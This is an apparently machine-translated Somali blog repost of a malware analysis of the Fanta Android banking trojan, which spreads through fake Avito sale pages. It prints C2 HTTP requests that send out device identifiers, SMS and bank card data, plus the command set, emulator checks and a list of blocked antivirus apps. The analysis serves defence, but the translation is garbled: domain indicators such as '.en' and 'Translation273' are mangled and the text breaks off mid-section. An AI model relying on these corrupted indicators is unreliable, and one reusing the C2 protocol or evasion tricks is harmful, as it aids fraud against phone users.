ProHoster > Блог > wararka internetka > Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

Maalin maalmaha ka mid ah waxaad dooneysaa inaad wax ku iibiso Avito, ka dib markaad dhejiso sharaxaad faahfaahsan oo ku saabsan alaabtaada (tusaale, module RAM), waxaad heli doontaa fariintan soo socota:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan horeMarkaad furto isku xirka, waxaad arki doontaa bog u muuqda mid aan dhib lahayn oo ogeysiinaya adiga, iibiyaha faraxsan oo guuleysta, in iibkaaga la sameeyay:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Markaad gujiso badhanka "Continue", faylka APK ayaa lagu soo dejin doonaa qalabkaaga Android oo wata calaamad iyo magac la aamini karo. Waxaad ku rakibtay codsi sababo jira awgeed u codsatay xuquuqaha Adeegga Helitaanka, ka dib dhawr daaqadood ayaa soo muuqday oo si degdeg ah u lumay ... Taasi waa.

Waxaad u tagaysaa si aad u hubiso hadhaagaaga, laakiin sababo jira awgeed codsigaga bangiga ayaa mar kale ku waydiinaya tafaasiisha kaadhkaaga. Ka dib marka la geliyo xogta, wax aad u xun ayaa dhacaya: sababo aan weli la fahmin adiga, lacagtu waxay bilaabataa inay ka baxdo xisaabtaada. Waxaad isku daydaa inaad xalliso dhibaatada, laakiin taleefankaagu wuu diiday: wuxuu riixaa dhabarka iyo furayaasha guriga keligiis, ma damiyo mana kuu ogolanayo inaad dhaqaajiso wax kasta oo amniga ah. Natiijo ahaan, lacag la'aan ayaa lagaa tagay, alaabtaada lama iibsan, waad wareersan tahay oo aad yaabtay: maxaa dhacay?

Jawaabtu waa sahlan tahay: waxaad tahay dhibane Fanta Android trojan, qoyska Flexnet. Sidee ku dhacday? Hadda aan sharaxno.

Qorayaasha: Andrey Polovinkin, Falanqeeyaha Xeerka xaasidnimada Yar, Ivan Pisarev, Falanqeeyaha Xeerka xaasidnimada.

Tirakoobka qaar

Qoyska Flexnet ee Android Trojans ayaa markii ugu horreysay la soo sheegay 2015. Muddo aad u dheer oo nashaad ah, qoysku waxa uu ku fiday dhawr nooc: Fanta, Limebot, Lipton, iwm. Trojan-ka, iyo sidoo kale kaabayaasha laxiriira, wali ma istaago: qorshayaal qaybin wax ku ool ah oo cusub ayaa la soo saarayaa - kiiskeena, bogag phishing tayo sare leh oo loogu talagalay isticmaale-iibiyaha gaarka ah, iyo horumariyeyaasha Trojan waxay raacaan isbeddellada moodada qorista fayraska - waxay ku daraan hawlqabad cusub oo suurtogal ka dhigaysa in si hufan lacag looga xado qalabka cudurka iyo hababka ilaalinta.

Ololaha lagu sharraxay maqaalkan ayaa loogu talagalay dadka isticmaala Ruushka, tiro yar oo qalab cudurka ah ayaa lagu duubay Ukraine, iyo xitaa in ka yar Kazakhstan iyo Belarus.

In kasta oo Flexnet ay ku jirtay garoonka Android Trojan in ka badan 4 sano oo ay cilmi-baarayaal badan si weyn u darseen, haddana qaab wanaagsan ayay u socotaa. Laga bilaabo Jannaayo 2019, khasaaraha suurtagalka ah wuxuu ka badan yahay 35 milyan oo rubles - tanina waxaa loogu talagalay ololayaasha Ruushka oo keliya. 2015, noocyada kala duwan ee Trojan-kan Android ayaa lagu iibiyay golayaasha dhulka hoostiisa ah, halkaas oo aad sidoo kale ka heli karto koodhka isha ee Trojan oo leh sharraxaad faahfaahsan. Waxayna tani ka dhigan tahay in tirakoobyada waxyeelada ee dunidu ay aad uga sii yaab badan tahay. odayga caynkaas ah ma aha wax xun, saw maaha?

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

Laga soo bilaabo iibka ilaa khayaanada

Sida laga arki karo sawirka hore loo soo bandhigay ee bogga phishing-ka ee hoos yimaada adeegga internetka ee xayeysiisyada Avito, waxaa loo diyaariyey dhibbanaha gaarka ah. Sida muuqata, weerarradu waxay adeegsadaan mid ka mid ah baarayaasha Avito, iyagoo soo jiidaya lambarka taleefanka iyo magaca iibiyaha, iyo sidoo kale sharraxaadda alaabta. Kadib geynta bogga iyo diyaarinta faylka APK, fariin SMS ah ayaa loo diraa dhibbanaha oo wata magaciisa iyo xiriirka bogga phishing-ka oo ka kooban sharaxaadda alaabtiisa iyo qadarka laga helay "iibka" alaabta. Markaad gujiso badhanka, isticmaaluhu wuxuu helayaa faylka APK xaasidnimada ah - Fanta.

Daraasad lagu sameeyay shcet491[.] ru domain waxay muujisay in loo wakiishay server-yada DNS ee Hostinger:

  • ns1.hostinger.ru
  • ns2.hostinger.ru
  • ns3.hostinger.ru
  • ns4.hostinger.ru

Faylka aagga domain wuxuu ka kooban yahay gelis tilmaamaya ciwaannada IP 31.220.23[.]236, 31.220.23[.]243, iyo 31.220.23[.]235. Si kastaba ha ahaatee, diiwaanka khayraadka sayidkiisa (A-rikoodhka) ayaa tilmaamaya serfarka leh ciwaanka IP-ga 178.132.1[.]240.

Ciwaanka IP-ga 178.132.1[.]240 wuxuu ku yaalaa Nederland waxaana iska leh martigeliyaha qulqulka adduunka. Ciwaanka IP-ga 31.220.23[.]235, 31.220.23[.]236 iyo 31.220.23[ Loo isticmaalo diiwaan-geliyaha openprov-ru. Domains sidoo kale waxaa lagu xalliyay ciwaanka IP 178.132.1[.]240:

  • sdelka-ru[.]ru
  • product-av[.]ru
  • av-product[.]ru
  • heshiis[.] en
  • shcet382[.]ru
  • sdelka221[.] en
  • sdelka211[.] en
  • vyplata437[.] ru
  • viplata291[.] en
  • Translation273[.] en
  • Translation901[.] en

Waa in la ogaadaa in isku xirka qaabkan soo socda laga heli karo ku dhawaad ​​dhammaan qaybaha:

http://(www.){0,1}<%domain%>/[0-9]{7}

Nashqadan qaabaysan waxa kale oo ka mid ah xidhiidhinta fariinta SMS Sida laga soo xigtay xogta taariikhiga ah, waxaa la ogaaday in dhowr xiriiriye sida ku cad qaabka kore ay u dhigmaan hal domain, taas oo muujinaysa isticmaalka hal domain si loo qaybiyo Trojan dhowr dhibbanayaal.

Aynu hore u yara boodno: server-ka kantaroolka ahaan, Trojan-ka laga soo dejiyo xiriirka SMS-ka ayaa isticmaala ciwaanka onuseseddohap[.] naadiga. Goobtan waxa la diiwaan galiyay 2019-03-12, oo laga bilaabo 2019-04-29, Apk Applications waxa ay la falgaleen boggan. Iyada oo ku saleysan xogta laga helay VirusTotal, wadar ahaan 109 codsi ayaa la falgalay server-kan. Goobta lafteeda waxaa lagu xalliyaa ciwaanka IP 217.23.14[.]27, oo ku taal Nederlaan oo uu leeyahay hoster qulqulka adduunka. Loo isticmaalo diiwaan-geliyaha magac-bixin. Domains sidoo kale waa lagu xalliyay ciwaanka IP-ga bad-racoon[.] naadiga (laga bilaabo 2018-09-25) iyo bad-racoon[.] nool (laga bilaabo 2018-10-25). leh domain bad-racoon[.] naadiga la falgalay in ka badan 80 faylasha APK, oo leh bad-racoon[.] nool - in ka badan 100.

Guud ahaan qaabka uu weerarku u dhacay waa sidan.

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

Maxay Fanta ku haysaa daboolka hoostiisa?

Sida Trojans kale oo badan oo Android ah, Fanta waxay awoodaa inay akhrido oo dirto fariimaha SMS-ka, sameyso codsiyada USSD, oo ay ku muujiso daaqadaheeda dusha codsiyada (ay ku jiraan kuwa bangiyada). Si kastaba ha ahaatee, in arsenal ee shaqada qoyska this yimid: Fanta bilaabay in ay isticmaalaan Adeegga Helitaanka ujeedooyin kala duwan: akhrinta waxa ku jira ogeysiisyada codsiyada kale, ka hortagga ogaanshaha iyo joojinta fulinta Trojan ee qalabka cudurka, iwm. Fanta wuxuu ku shaqeeyaa dhammaan noocyada Android ee ka weyn 4.4. Maqaalkan, waxaan si dhow u eegi doonaa muunada Fanta ee soo socota:

  • MD5: 0826bd11b2c130c4c8ac137e395ac2d4
  • SHA1: ac33d38d486ee4859aa21b9aeba5e6e11404bcc8
  • SHA256: df57b7e7ac6913ea5f4daad319e02db1f4a6b243f2ea6500f83060648da6edfb

Isla markiiba ka dib bilaabista

Isla markiiba ka dib markii la bilaabay, Trojan-ku wuxuu qarinayaa astaanta. Codsigu wuxuu shaqayn karaa oo keliya haddii magaca aaladda cudurka qabta aanu ku jirin liiska:

  • maxamed_x86
  • VirtualBox
  • Nexus 5X (bullhead)
  • Nexus 5 (madiir)

Jeegagaan waxa lagu sameeyaa adeega Trojan ee ugu muhiimsan - Adeegga Guud. Inta lagu jiro bilawga koowaad, cabbirada qaabeynta arjiga waxaa lagu bilaabaa qiyamka caadiga ah (qaabka kaydinta xogta qaabeynta iyo macnahooda ayaa laga wada hadli doonaa mar dambe), iyo sidoo kale diiwaangelinta aaladda cusub ee cudurka qaba ee server-ka kantaroolka. Codsiga HTTP POST ayaa loo diri doona serverka oo wata nooca fariinta diiwangeli_bot iyo macluumaadka ku saabsan qalabka cudurka (nooca Android, IMEI, lambarka taleefanka, magaca hawlwadeenka iyo lambarka waddanka uu ka diiwaangashan yahay hawlwadeenku). Cinwaanka waxa loo istcimaalaa maamule ahaan hXXp://onuseseddohap[.]club/controller.php. Isagoo ka jawaabaya, server-ku wuxuu soo diraa fariin ka kooban meelaha bot_id, bot_pwd, server - qiyamkan waxaa lagu keydiyay arjiga sida cabbirrada server-ka CnC. Halbeegga server Ikhtiyaar ah haddii goobta aan la helin: Fanta waxay isticmaashaa ciwaanka diiwaangelinta - hXXp://onuseseddohap[.]club/controller.php. Shaqada beddelka ciwaanka CnC waxaa loo isticmaali karaa in lagu xalliyo laba dhibaato: in si siman loo qaybiyo culayska u dhexeeya dhawr adeegayaal (oo leh tiro badan oo aaladaha cudurka qaba, culeyska ku jira server-ka shabakadda ee aan la hagaajin wuxuu noqon karaa mid sare), iyo sidoo kale in la isticmaalo beddelka server haddii ay dhacdo in mid ka mid ah server-yada CnC uu ku guuldareysto.

Haddii qalad dhaco marka codsiga la dirayo, Trojan-ku wuxuu ku celin doonaa nidaamka diiwaangelinta 20 ilbiriqsi ka dib.

Ka dib markii si guul leh loo diiwaan geliyo qalabka, Fanta waxay tusi doontaa fariintan soo socota isticmaallaha:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Xusuusin muhiim ah: adeeg la yiraahdo Amniga nidaamka - magaca adeegga Trojan, iyo ka dib markaad gujiso badhanka OK daaqad leh aaladda marinka u heelaysa ayaa furmi doonta, halkaas oo isticmaaluhu uu laftiisu siinayo xuquuqaha gelitaanka adeega xaasidnimada ah:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Marka isticmaaluhu shidmo Adeegga Helitaanka, Fanta waxay gasho waxa ku jira daaqadaha codsiga iyo ficillada lagu sameeyay iyaga:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Isla markiiba ka dib markii la helo xuquuqaha Helitaanka, Trojan-ku wuxuu codsanayaa xuquuqaha maamulaha iyo xuquuqaha inuu akhriyo ogeysiisyada:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Iyada oo la kaashanayo Adeegga Helitaanka, arjigu wuxuu matalaa furayaasha furaha, si ay isu siiso dhammaan xuquuqaha lagama maarmaanka ah.

Fanta waxay abuurtaa dhowr xaaladood oo xog-ururin ah (kuwaas oo gadaal lagu sharxi doono) lagama maarmaanka u ah in la badbaadiyo xogta qaabeynta, iyo sidoo kale macluumaadka ku saabsan aaladda cudurka qabta ee la aruuriyay inta lagu gudajiro howsha. Si loo soo diro macluumaadka la ururiyey, Trojan-ku wuxuu abuuraa hawl soo noqnoqota oo loogu talagalay in laga soo dejiyo goobaha kaydka xogta oo uu ka helo amar server-ka kantaroolka. Muddada u dhaxaysa wacitaanka CnC ayaa loo dejiyay iyadoo ku xidhan nooca Android: xaaladda 5.1, muddada u dhaxaysaa waxay ahaan doontaa 10 ilbiriqsi, haddii kale 60 sekan.

Si aad u hesho amar, Fanta waxa ay samaysaa codsi HelTask si ay u xakameeyaan server-ka. Jawaabta, CnC waxay soo diri kartaa mid ka mid ah amarada soo socda:

kooxda Description
0 Dir fariin SMS
1 Wac telefoon ama amar USSD
2 Cusboonaysii halbeegga bareeg
3 Cusboonaysii halbeegga joojinta
6 Cusboonaysii halbeegga smsMaareeye
9 Bilow ururinta fariimaha SMS-ka
11 Taleefanka ku celi goobaha warshada
12 Awood-siinta/dami-u-dhigista samaynta sanduuqyada wada-hadalka

Fanta waxay sidoo kale ururisaa ogaysiisyada 70 bangi, lacag-bixin degdeg ah iyo codsiyada e-wallet waxayna ku kaydisaa kaydka xogta.

Kaydinta xuduudaha qaabeynta

Si loo kaydiyo xuduudaha qaabeynta, Fanta waxay isticmaashaa habka caadiga ah ee aaladda Android - Waxa aad rabtid-faylal Dejinta waxaa lagu kaydin doonaa fayl la magacaabay dejinta. Sharaxaadda xuduudaha la badbaadiyey waxay ku taal shaxda hoose.

magaca Qiimaha caadiga ah Qiimaha macquulka ah Description
id 0 Integer Aqoonsiga Bot
server hXXp://onuseseddohap[.]club/ URL Ciwaanka serverka maamulka
pwd - string Furaha adeegaha
bareeg 20 Integer Waqtiga u dhexeeya Muujinaya ilaa inta dib loo dhigayo hawlaha soo socda:

  • Markaad dirayso codsi ku saabsan heerka fariinta SMS ee la soo diray
  • Helitaanka amar cusub oo ka imanaya server-ka kantaroolka
joojinta oo dhan All/tel Number Haddii garoonku le'eg yahay xadhig oo dhan ama lambarka tel, markaas fariinta SMS ee la helay waxaa dhexda u geli doona arjiga oo lama tusi doono isticmaalaha
smsMaareeye 0 0/1 Daar / dami arjiga sida qaataha SMS-ka caadiga ah
ReadDialog been ah Run/been Dami/Dami gelida dhacdada Dhacdada Helitaanka

Fanta sidoo kale waxay isticmaashaa faylka smsMaareeye:

magaca Qiimaha caadiga ah Qiimaha macquulka ah Description
pckg - string Magaca maamulaha SMS-ka ee la isticmaalay

Isdhexgalka database

Trojan-ku waxa uu isticmaalaa laba xog-ururin inta uu shaqaynayo. Xogta la magacaabay a loo isticmaalo in lagu kaydiyo macluumaadka kala duwan ee laga soo ururiyay telefoonka. Kaydka labaad ayaa la magacaabay fanta.db waxaana loo isticmaalaa in lagu badbaadiyo goobaha mas'uulka ka ah abuurista daaqadaha phishing ee loogu talagalay in lagu ururiyo macluumaadka ku saabsan kaararka bangiga.

Trojan waxay isticmaashaa xogta xogta а si ay u kaydiyaan macluumaadka la ururiyey oo ay galiyaan falalkooda. Xogta waxa lagu kaydiyaa shax abuse. Weydiinta SQL ee soo socota ayaa loo isticmaalaa si loo abuuro miis:

create table logs ( _id integer primary key autoincrement, d TEXT, f TEXT, p TEXT, m integer)

Xog-ururinta waxa ku jira macluumaadka soo socda:

1. Gelida aaladda cudurka qabta oo fariin wadata Taleefanka shidmay!

2. Ogeysiinta codsiyada. Fariinta waxaa loo sameeyay si waafaqsan qaabka soo socda:

(<%App Name%>)<%Title%>: <%Notification text%>

3. Xogta kaadhka bangiga ee foomamka phishing-ka ee uu sameeyay Trojan-ku. Halbeegga VIEW_NAME wuxuu noqon karaa mid ka mid ah liiska:

  • AliExpress
  • Avito
  • Google Play
  • Kala duwan <% App Name%>

Fariinta waxay u qoran tahay qaabka:

[<%Time in format HH:mm:ss dd.MM.yyyy%>](<%VIEW_NAME%>) Номер карты:<%CARD_NUMBER%>; Дата:<%MONTH%>/<%YEAR%>; CVV: <%CVV%>

4. Farriimaha SMS-ka soo socda/ baxaya ee qaabka:

([<%Time in format HH:mm:ss dd.MM.yyyy%>] Тип: Входящее/Исходящее) <%Mobile number%>:<%SMS-text%>

5. Macluumaadka ku saabsan xirmada abuureysa sanduuqa wada-hadalka ee qaabka:

(<%Package name%>)<%Package information%>

Tusaalaha shaxda abuse:

Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
Mid ka mid ah hawlaha Fanta waa ururinta macluumaadka ku saabsan kaararka bangiga. Xogta waxaa la ururiyaa iyadoo la abuurayo daaqadaha phishing marka la furayo codsiyada bangiyada. Trojan-ku waxa uu abuuraa daaqad phishing ah hal mar oo kaliya. Macluumaadka daaqadda la tusay isticmaaluhu waxay ku kaydsan tahay miiska dejinta keydka macluumaadka fanta.db. Weydiinta SQL ee soo socota ayaa loo isticmaalaa si loo abuuro xogta:

create table settings (can_login integer, first_bank integer, can_alpha integer, can_avito integer, can_ali integer, can_vtb24 integer, can_telecard integer, can_another integer, can_card integer);

Dhammaan goobaha miiska dejinta lagu bilaabay 1 (abuur daaqada phishing) si caadi ah. Ka dib marka isticmaaluhu galo xogtooda, qiimaha waxaa loo dejin doonaa 0. Tusaalaha shaxda dejinta:

  • gali kara - goobta ayaa mas'uul ka ah soo bandhigida foomka marka la furayo codsiga bangiga
  • first_bangi - aan la isticmaalin
  • karaa_avito - goobta ayaa mas'uul ka ah soo bandhigida foomka marka la furayo codsiga Avito
  • can_ali - goobta ayaa mas'uul ka ah soo bandhigida foomka marka la furayo codsiga Aliexpress
  • karaa_kale - goobta ayaa mas'uul ka ah soo bandhigida foomka marka la furayo codsi kasta oo liiska: Yula, Pandao, Drome Auto, Wallet. Qiimo dhimis iyo kaadhadhka gunnada, Aviasales, Booking, Trivago
  • kartoo_kaar - goobta ayaa mas'uul ka ah muujinta foomka marka la furayo Google Play

Isdhexgalka server-ka kantaroolka

Isdhexgalka shabakada ee server-ka kontoroolka wuxuu ku dhacaa habka HTTP. Fanta waxay isticmaashaa maktabadda Retrofit ee caanka ah si ay ula shaqeyso shabakada. Codsiyada waa loo diraa hXXp://onuseseddohap[.]club/controller.php. Ciwaanka serverka waa la bedeli karaa marka la iska diiwaan gelinayo seerfarka. Buskudka ayaa laga yaabaa in laga soo celiyo server-ka. Fanta waxay samaysaa codsiyada soo socda ee serverka:

  • Diiwaangelinta Bot ee server-ka kantaroolku waxay dhacdaa hal mar bilawga koowaad. Xogta soo socota ee ku saabsan aaladda cudurka qabta waxaa loo diraa serfarka:
    · cookie - cookies-ka laga helay server-ka (qiimaha hore waa xadhig madhan)
    · mode - xadhig joogto ah diiwangeli_bot
    · horgale - tiro joogto ah 2
    · nooca_sdk - waxaa loo sameeyay si waafaqsan template soo socda: <%Build.MODEL%>/<%Dhisi.VERSION.SIIDAY%>(Avit)
    · IMEI - IMEI ee qalabka cudurka
    · dalka - code ee waddanka uu ka diiwaan gashan yahay hawlwadeenka, qaab ISO
    · tirada - lambarka taleefanka
    · operator - magaca hawlwadeenka

    Tusaalaha codsiga loo diray serverka:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Content-Length: 144
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=register_bot&prefix=2&version_sdk=<%VERSION_SDK%>&imei=<%IMEI%>&country=<%COUNTRY_ISO%>&number=<%TEL_NUMBER%>&operator=<%OPERATOR_NAME%>

    Si looga jawaabo codsiga, adeeguhu waa inuu soo celiyaa shay JSON oo ka kooban cabbirrada soo socda:
    bot_id - aqoonsiga qalabka cudurka. Haddii bot_id uu la mid yahay 0, Fanta ayaa dib u fulin doonta codsiga.
    bot_pwd - erayga sirta ah ee server-ka.
    server - cinwaanka server-ka kantaroolka. Halbeegga ikhtiyaariga ah. Haddii halbeegga aan la cayimin, ciwaanka ku kaydsan codsiga waa la isticmaali doonaa.

    Tusaale shayga JSON:

    {
    "response":[
   	 {
   		 "bot_id": <%BOT_ID%>,
   		 "bot_pwd": <%BOT_PWD%>,
   		 "server": <%SERVER%>
   	 }
    ],
    "status":"ok"
}

  • Codso inaad ka hesho amar server-ka Xogta soo socota ayaa loo diraa seerfarka:
    · cookie - cookies-ka laga helay server-ka
    · dalab - id ee qalabka cudurka, kaas oo la helay markii la dirayay codsiga diiwangeli_bot
    · pwd -password-ka server-ka
    · qayb_admin - goobta ayaa go'aamisa in xuquuqda maamulka la helay iyo in kale. Haddii xuquuqaha maamulaha la helay, goobta ayaa la mid ah 1, haddii kale 0
    · Helitaanka - heerka Adeegga Helitaanka. Haddii adeegga la bilaabay, qiimuhu waa 1, haddii kale 0
    · SMSMaareeyaha - waxay tusinaysaa haddii trojan-ku karti u leeyahay inuu yahay codsiga caadiga ah ee helitaanka SMS
    · screen - waxay tusinaysaa heerka ay shaashadda ku taal. qiimaha ayaa la dejin doonaa 1haddii shaashadu shid, haddii kale 0;

    Tusaalaha codsiga loo diray serverka:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=getTask&bid=<%BID%>&pwd=<%PWD%>&divice_admin=<%DEV_ADM%>&Accessibility=<%ACCSBL%>&SMSManager=<%SMSMNG%>&screen=<%SCRN%>

    Iyada oo ku xidhan amarka, seerfarku waxa uu soo celin karaa shay JSON oo leh cabbirro kala duwan:

    · kooxda Dir fariin SMSHalbeegyada waxaa ku jira lambarka taleefanka, qoraalka farriinta SMS-ka iyo aqoonsiga farriinta la dirayo. Aqoonsiga waxaa la adeegsadaa marka fariin loo dirayo serverka nooca setSmsStatus. 

    {
    "response":
    [
   	 {
   		 "mode": 0,
   		 "sms_number": <%SMS_NUMBER%>,
   		 "sms_text": <%SMS_TEXT%>,
   		 "sms_id": %SMS_ID%
   	 }
    ],
    "status":"ok"
}

    · kooxda Wac telefoon ama amar USSD: Lambarka taleefanka ama amarku wuxuu ku yimaadaa jirka jawaabta. 

    {
    "response":
    [
   	 {
   		 "mode": 1,
   		 "command": <%TEL_NUMBER%>
   	 }
    ],
    "status":"ok"
}

    · kooxda Beddel inta u dhaxaysa. 

    {
    "response":
    [
   	 {
   		 "mode": 2,
   		 "interval": <%SECONDS%>
   	 }
    ],
    "status":"ok"
}

    · kooxda Beddel cabbirka dhexda. 

    {
    "response":
    [
   	 {
   		 "mode": 3,
   		 "intercept": "all"/"telNumber"/<%ANY_STRING%>
   	 }
    ],
    "status":"ok"
}

    · kooxda Beddel goobta SmsManager. 

    {
    "response":
    [
   	 {
   		 "mode": 6,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

    · kooxda Ka soo ururi fariimaha SMS-ka aaladda cudurka qaba.

    {
    "response":
    [
   	 {
   		 "mode": 9
   	 }
    ],
    "status":"ok"
}

    · kooxda Taleefanka ku celi goobaha warshada: 

    {
    "response":
    [
   	 {
   		 "mode": 11
   	 }
    ],
    "status":"ok"
}

    · kooxda Beddel dejinta ReadDialog. 

    {
    "response":
    [
   	 {
   		 "mode": 12,
   		 "enable": 0/1
   	 }
    ],
    "status":"ok"
}

  • Diritaanka fariin leh nooca setSmsStatus. Codsigan waxaa la sameeyaa ka dib fulinta amarka Dir fariin SMS. Codsigu wuxuu u eg yahay sidan:

POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSmsStatus&id=<%ID%>&status_sms=<%PWD%>

  • Soo gudbinta waxa ku jira kaydka xogta Hal xadhig ayaa la wareejiyaa codsi kasta Xogta soo socota ayaa loo diraa seerfarka:
    · cookie - cookies-ka laga helay server-ka
    · mode - xadhig joogto ah dejiSaveInboxSms
    · dalab - id ee qalabka cudurka, kaas oo la helay markii la dirayay codsiga diiwangeli_bot
    · text - qoraalka ku jira diiwaanka xogta ee hadda (field d miiska ka soo abuse keydka macluumaadka а)
    · tirada - magaca diiwaanka xogta hadda jira (field p miiska ka soo abuse keydka macluumaadka а)
    · sms_mode - qiimaha isugeynta (beegga m miiska ka soo abuse keydka macluumaadka а)

    Codsigu wuxuu u eg yahay sidan:

    POST /controller.php HTTP/1.1
Cookie:
Content-Type: application/x-www-form-urlencoded
Host: onuseseddohap.club
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: okhttp/3.6.0

mode=setSaveInboxSms&bid=<%APP_ID%>&text=<%a.logs.d%>&number=<%a.logs.p%>&sms_mode=<%a.logs.m%>

    Marka si guul leh loo gudbiyo serverka, safka ayaa laga saari doonaa miiska. Tusaale shay JSON ah oo uu soo celiyay seerfarku:

    {
    "response":[],
    "status":"ok"
}

Isdhexgalka Adeegga Helitaanka

Adeegga Helitaanka waxaa loo hirgeliyay si loogu fududeeyo dadka naafada ah inay isticmaalaan aaladaha Android. Inta badan, isdhexgalka jirka ayaa loo baahan yahay si loola falgalo codsiga. Adeegga Helitaanka wuxuu kuu oggolaanayaa inaad u sameyso barnaamij ahaan. Fanta waxay adeegsataa adeegga si ay u abuurto daaqado been abuur ah codsiyada bangiyada iyo ka hortagga goobaha nidaamka iyo codsiyada qaarkood inay furmaan.

Isticmaalka shaqeynta Adeegga Helitaanka, Trojan-ku wuxuu kormeeraa isbeddelada curiyeyaasha shaashadda aaladda cudurka qaba. Sidii hore loo sharraxay, goobaha Fanta waxay ka kooban yihiin halbeeg mas'uul ka ah xidhitaanka hawlgallada sanduuqyada wada hadalka - ReadDialog. Haddii doorashadan la dejiyo, macluumaadka ku saabsan magaca iyo sharraxaadda xirmada shaqada ka eriday ayaa lagu dari doonaa kaydka xogta. Trojan-ku wuxuu sameeyaa ficilada soo socda marka uu kiciyo:

  • Wuxuu u ekaysiiyaa talaabooyinka dhabarka iyo guriga haddii ay dhacdo:
    · haddii isticmaaluhu rabo inuu dib u bilaabo qalabkiisa
    · Haddii isticmaaluhu rabo inuu tirtiro codsiga "Avito" ama beddelo xuquuqda gelitaanka
    · Haddii ay jirto xusus ku saabsan codsiga "Avito" ee bogga
    · marka aad furto abka "Google Play Protect"
    · markaad furayso bogag leh habaynta Adeegga Helitaanka
    · marka sanduuqa wada hadalka Amniga Nidaamka uu soo baxo
    · markaad furto bogga dejimaha "Ku sawir app kale"
    · marka aad furto bogga "Applications", "Backup and Reset", "Reset Data", "Reset Settings", "Developer Panel", "Spec. fursadaha", "helitaanka", "xuquuqda gaarka ah"
    · haddii dhacdadu ay ka timid codsiyo gaar ah.

    Liiska codsiga

    • android
    • Master Lite
    • Nadiifi Master
    • Nadiifi Master ee x86 CPU
    • Meizu Applicatiom Maaraynta Oggolaanshaha
    • MIUI Amniga
    • Master nadiif ah - Kahortagga fayraska & Cache & Nadiifiyaha Junk
    • Xakamaynta waalidka iyo GPS: Kaspersky SafeKids
    • Kaspersky Antivirus AppLock & Web Security Beta
    • Nadiifiyaha fayraska, ka-hortagga fayraska, Nadiifiyaha (MAX Security)
    • Mobile AntiVirus Security PRO
    • Avast antivirus & difaac bilaash ah 2019
    • Ammaanka Mobilka MegaFon
    • Ilaalinta AVG ee Xperia
    • Ammaanka Mobile-ka
    • Malwarebytes antivirus & difaac
    • Antivirus-ka Android 2019
    • Master Security - Antivirus, VPN, AppLock, Booster
    • Antivirus AVG ee kiniinka Maareeyaha Nidaamka Huawei
    • Helitaanka Samsung
    • Samsung Smart Manager
    • Amniga Master
    • Xawaaraha Xawaaraha
    • dr.web
    • Booska Amniga Dr.Web
    • Dr.Web Mobile Control Center
    • Dr.Web Security Space Life
    • Dr.Web Mobile Control Center
    • Antivirus & Ammaanka Mobile -ka
    • Kaspersky Internet Security: Antivirus iyo Protection
    • Nolosha Battery ee Kaspersky: Badbaadiye & Kobciye
    • Kaspersky Endpoint Security - ilaalinta iyo maaraynta
    • AVG Antivirus bilaash ah 2019 - Ilaalinta Android
    • Antivirus Android
    • Norton Mobile Security iyo Antivirus
    • Kahortagga fayraska, firewall, VPN, amniga mobilada
    • Ammaanka Mobilka: Ka-hortagga fayraska, VPN, Ka-hortagga tuugada
    • Antivirus-ka Android

  • Haddii ogolaansho la codsado marka fariin SMS loo dirayo nambar gaaban, Fanta waxay ku tusinaysaa adigoo gujinaya sanduuqa hubinta Xusuusnow doorashada iyo badhanka dir.
  • Markaad isku daydo inaad ka qaado xuquuqda maamulaha Trojan, waxay xannibaysaa shaashadda taleefanka.
  • Waxay ka hortagtaa maamulayaasha cusub in lagu soo daro.
  • Haddii codsiga antivirus dr.web la ogaaday khatar iska indhatir.
  • Trojan-ku waxa uu isku dayaa in uu riixo batoonka dambe iyo kan guriga haddii dhacdada uu ka yimid arjiga Daryeelka Qalabka Samsung.
  • Fanta waxay samaysaa daaqado phishing ah oo wata foomam lagu gelinayo macluumaadka ku saabsan kaadhadhka bangiga haddii codsi ka mid ah liis ilaa 30 adeegyo internet oo kala duwan ah la bilaabay. Waxaa ka mid ah: AliExpress, Booking, Avito, Google Play Market Component, Pandao, Drome Auto, iwm.

    Foomamka Fishingka

    Fanta ayaa falanqaynaysa codsiyada ku shaqeeya aaladda cudurka qaba. Haddii codsiga xiisaha la furay, Trojan-ku waxa uu soo bandhigayaa daaqad phishing ah oo ka koraysa dhammaan kuwa kale, kaas oo ah foomka gelitaanka macluumaadka ku saabsan kaarka bangiga. Isticmaaluhu wuxuu u baahan yahay inuu galo xogta soo socota:

    • Омер карты
    • Taariikhda uu kaadhku dhacayo
    • CVV
    • Magaca kaadhka haysta (ma aha bangiyada oo dhan)

    Iyada oo ku xidhan codsiga socda, daaqadaha phishing kala duwan ayaa la soo bandhigi doonaa. Kuwa soo socda waa tusaalayaal qaarkood:

    AliExpress:

    Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
    Avto:

    Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore
    Codsiyada kale qaarkood sida Google Play Market, Aviasales, Pandao, Booking, Trivago:
    Leysya, Fanta: xeelad cusub oo loogu talagalay Android Trojan hore

    Sida ay runtii ahayd

